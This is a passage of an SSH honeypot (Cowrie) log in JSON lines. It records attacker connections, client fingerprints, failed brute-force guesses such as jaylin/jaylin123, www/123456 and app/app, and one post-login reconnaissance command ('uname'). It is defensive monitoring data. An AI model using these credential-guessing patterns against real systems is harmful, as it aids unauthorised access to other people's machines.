{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-08-31T06:57:55.792496Z","src_ip":"212.227.125.160","session":"a984a18b5cb9"}
{"eventid":"cowrie.login.failed","username":"jaylin","password":"jaylin","message":"login attempt [jaylin/jaylin] failed","sensor":"my-vps","timestamp":"2025-08-31T06:57:56.212024Z","src_ip":"212.227.125.160","session":"a984a18b5cb9"}
{"eventid":"cowrie.login.failed","username":"jaylin","password":"jaylin1","message":"login attempt [jaylin/jaylin1] failed","sensor":"my-vps","timestamp":"2025-08-31T06:57:57.298759Z","src_ip":"212.227.125.160","session":"a984a18b5cb9"}
{"eventid":"cowrie.login.failed","username":"jaylin","password":"jaylin123","message":"login attempt [jaylin/jaylin123] failed","sensor":"my-vps","timestamp":"2025-08-31T06:57:58.385422Z","src_ip":"212.227.125.160","session":"a984a18b5cb9"}
{"eventid":"cowrie.login.failed","username":"jaylin","password":"jaylin1234","message":"login attempt [jaylin/jaylin1234] failed","sensor":"my-vps","timestamp":"2025-08-31T06:57:59.472851Z","src_ip":"212.227.125.160","session":"a984a18b5cb9"}
{"eventid":"cowrie.login.failed","username":"jaylin","password":"jaylin12345","message":"login attempt [jaylin/jaylin12345] failed","sensor":"my-vps","timestamp":"2025-08-31T06:58:00.558903Z","src_ip":"212.227.125.160","session":"a984a18b5cb9"}
{"eventid":"cowrie.session.closed","duration":"5.9","message":"Connection lost after 5.9 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:58:01.646260Z","src_ip":"212.227.125.160","session":"a984a18b5cb9"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":46370,"dst_ip":"1.2.3.4","dst_port":22,"session":"c5a5acdc5e57","protocol":"ssh","message":"New connection: 212.227.235.229:46370 (1.2.3.4:22) [session: c5a5acdc5e57]","sensor":"my-vps","timestamp":"2025-08-31T06:58:05.258869Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T06:58:05.993346Z","src_ip":"212.227.235.229","session":"c5a5acdc5e57"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T06:58:05.994036Z","src_ip":"212.227.235.229","session":"c5a5acdc5e57"}
{"eventid":"cowrie.session.closed","duration":13.941078186035156,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:58:09.596590Z","src_ip":"212.227.125.160","session":"5f96b6d0d757"}
{"eventid":"cowrie.login.failed","username":"user","password":"abc123","message":"login attempt [user/abc123] failed","sensor":"my-vps","timestamp":"2025-08-31T06:58:11.912785Z","src_ip":"212.227.235.229","session":"c5a5acdc5e57"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T06:58:13.396634Z","src_ip":"212.227.125.160","session":"70004e68a872"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-31T06:58:13.397307Z","src_ip":"212.227.125.160","session":"70004e68a872"}
{"eventid":"cowrie.session.closed","duration":"8.4","message":"Connection lost after 8.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:58:13.613854Z","src_ip":"212.227.235.229","session":"c5a5acdc5e57"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":38378,"dst_ip":"1.2.3.4","dst_port":22,"session":"afb6ce5d4375","protocol":"ssh","message":"New connection: 212.227.235.229:38378 (1.2.3.4:22) [session: afb6ce5d4375]","sensor":"my-vps","timestamp":"2025-08-31T06:58:16.196276Z"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"4.2","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 4.2 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:58:17.627872Z","src_ip":"212.227.125.160","session":"70004e68a872"}
{"eventid":"cowrie.session.closed","duration":"106.4","message":"Connection lost after 106.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:58:17.631437Z","src_ip":"212.227.125.160","session":"70004e68a872"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T06:58:20.930768Z","src_ip":"212.227.235.229","session":"afb6ce5d4375"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T06:58:20.932738Z","src_ip":"212.227.235.229","session":"afb6ce5d4375"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":36218,"dst_ip":"1.2.3.4","dst_port":22,"session":"bef616c4c4a9","protocol":"ssh","message":"New connection: 212.227.125.160:36218 (1.2.3.4:22) [session: bef616c4c4a9]","sensor":"my-vps","timestamp":"2025-08-31T06:58:26.326738Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T06:58:27.006381Z","src_ip":"212.227.125.160","session":"bef616c4c4a9"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T06:58:27.007171Z","src_ip":"212.227.125.160","session":"bef616c4c4a9"}
{"eventid":"cowrie.login.failed","username":"user","password":"abc123","message":"login attempt [user/abc123] failed","sensor":"my-vps","timestamp":"2025-08-31T06:58:29.758110Z","src_ip":"212.227.125.160","session":"bef616c4c4a9"}
{"eventid":"cowrie.session.closed","duration":"4.9","message":"Connection lost after 4.9 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:58:31.261448Z","src_ip":"212.227.125.160","session":"bef616c4c4a9"}
{"eventid":"cowrie.login.failed","username":"nexus","password":"nexus","message":"login attempt [nexus/nexus] failed","sensor":"my-vps","timestamp":"2025-08-31T06:58:48.670443Z","src_ip":"212.227.235.229","session":"afb6ce5d4375"}
{"eventid":"cowrie.session.closed","duration":"38.6","message":"Connection lost after 38.6 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:58:54.793875Z","src_ip":"212.227.235.229","session":"afb6ce5d4375"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":51138,"dst_ip":"1.2.3.4","dst_port":22,"session":"3241b5f725f0","protocol":"ssh","message":"New connection: 212.227.125.160:51138 (1.2.3.4:22) [session: 3241b5f725f0]","sensor":"my-vps","timestamp":"2025-08-31T06:58:57.343099Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":53084,"dst_ip":"1.2.3.4","dst_port":22,"session":"def616d6e1f6","protocol":"ssh","message":"New connection: 212.227.235.229:53084 (1.2.3.4:22) [session: def616d6e1f6]","sensor":"my-vps","timestamp":"2025-08-31T06:59:04.089946Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T06:59:04.847077Z","src_ip":"212.227.235.229","session":"def616d6e1f6"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T06:59:04.847733Z","src_ip":"212.227.235.229","session":"def616d6e1f6"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T06:59:06.794554Z","src_ip":"212.227.125.160","session":"3241b5f725f0"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T06:59:06.796146Z","src_ip":"212.227.125.160","session":"3241b5f725f0"}
{"eventid":"cowrie.login.failed","username":"www","password":"123456","message":"login attempt [www/123456] failed","sensor":"my-vps","timestamp":"2025-08-31T06:59:10.787642Z","src_ip":"212.227.235.229","session":"def616d6e1f6"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":58405,"dst_ip":"1.2.3.4","dst_port":22,"session":"54668fcc291c","protocol":"ssh","message":"New connection: 212.227.235.229:58405 (1.2.3.4:22) [session: 54668fcc291c]","sensor":"my-vps","timestamp":"2025-08-31T06:59:11.257602Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T06:59:12.030425Z","src_ip":"212.227.235.229","session":"54668fcc291c"}
{"eventid":"cowrie.session.closed","duration":"8.6","message":"Connection lost after 8.6 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:59:12.693125Z","src_ip":"212.227.235.229","session":"def616d6e1f6"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T06:59:12.825874Z","src_ip":"212.227.235.229","session":"54668fcc291c"}
{"eventid":"cowrie.login.failed","username":"vpn","password":"pass","message":"login attempt [vpn/pass] failed","sensor":"my-vps","timestamp":"2025-08-31T06:59:21.181604Z","src_ip":"212.227.235.229","session":"54668fcc291c"}
{"eventid":"cowrie.session.closed","duration":"11.1","message":"Connection lost after 11.1 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:59:22.366789Z","src_ip":"212.227.235.229","session":"54668fcc291c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":42884,"dst_ip":"1.2.3.4","dst_port":22,"session":"432f695ee437","protocol":"ssh","message":"New connection: 212.227.125.160:42884 (1.2.3.4:22) [session: 432f695ee437]","sensor":"my-vps","timestamp":"2025-08-31T06:59:25.223563Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T06:59:25.770380Z","src_ip":"212.227.125.160","session":"432f695ee437"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T06:59:25.771554Z","src_ip":"212.227.125.160","session":"432f695ee437"}
{"eventid":"cowrie.login.failed","username":"www","password":"123456","message":"login attempt [www/123456] failed","sensor":"my-vps","timestamp":"2025-08-31T06:59:28.084437Z","src_ip":"212.227.125.160","session":"432f695ee437"}
{"eventid":"cowrie.login.failed","username":"app","password":"app","message":"login attempt [app/app] failed","sensor":"my-vps","timestamp":"2025-08-31T06:59:28.927958Z","src_ip":"212.227.125.160","session":"3241b5f725f0"}
{"eventid":"cowrie.session.closed","duration":"4.4","message":"Connection lost after 4.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:59:29.581148Z","src_ip":"212.227.125.160","session":"432f695ee437"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":37480,"dst_ip":"1.2.3.4","dst_port":22,"session":"6a6522b41925","protocol":"ssh","message":"New connection: 212.227.235.229:37480 (1.2.3.4:22) [session: 6a6522b41925]","sensor":"my-vps","timestamp":"2025-08-31T06:59:32.443059Z"}
{"eventid":"cowrie.session.closed","duration":"39.5","message":"Connection lost after 39.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:59:36.885889Z","src_ip":"212.227.125.160","session":"3241b5f725f0"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T06:59:37.779752Z","src_ip":"212.227.235.229","session":"6a6522b41925"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T06:59:37.780402Z","src_ip":"212.227.235.229","session":"6a6522b41925"}
{"eventid":"cowrie.login.failed","username":"app","password":"app","message":"login attempt [app/app] failed","sensor":"my-vps","timestamp":"2025-08-31T07:00:02.190271Z","src_ip":"212.227.235.229","session":"6a6522b41925"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":59190,"dst_ip":"1.2.3.4","dst_port":22,"session":"36b49fbdd5e5","protocol":"ssh","message":"New connection: 212.227.235.229:59190 (1.2.3.4:22) [session: 36b49fbdd5e5]","sensor":"my-vps","timestamp":"2025-08-31T07:00:02.824525Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T07:00:03.590286Z","src_ip":"212.227.235.229","session":"36b49fbdd5e5"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-25